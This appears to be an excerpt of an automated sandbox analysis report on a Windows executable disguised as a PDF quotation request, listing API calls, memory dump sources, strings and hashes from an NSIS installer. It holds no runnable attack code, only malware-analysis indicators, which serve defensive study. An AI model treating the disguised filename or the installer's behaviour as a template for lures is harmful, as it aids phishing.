                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                  Strings
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID: Calibri
                                                                                                                                  • API String ID: 3808545654-1409258342
                                                                                                                                  APIs
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                    • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                  Memory Dump Source
                                                                                                                                   • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4216380887-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                  Strings
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsb13EA.tmp$C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll
                                                                                                                                  • API String ID: 3109718747-1763355078
                                                                                                                                  APIs
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeGlobal
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2979337801-0
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                  • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1148316912-0
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                  • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                  • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: Call
                                                                                                                                  • API String ID: 3677997916-1824292864
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 2659869361-823278215
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3585118688-0
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 00405AC2
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                  • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 00405B6A
                                                                                                                                  • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 3248276644-823278215
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                  • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405748
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 1100898210-823278215
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                  • API String ID: 2709904686-1246513382
                                                                                                                                  • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                  • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                                                  • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                  • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                  • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                  • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                  • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                  • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
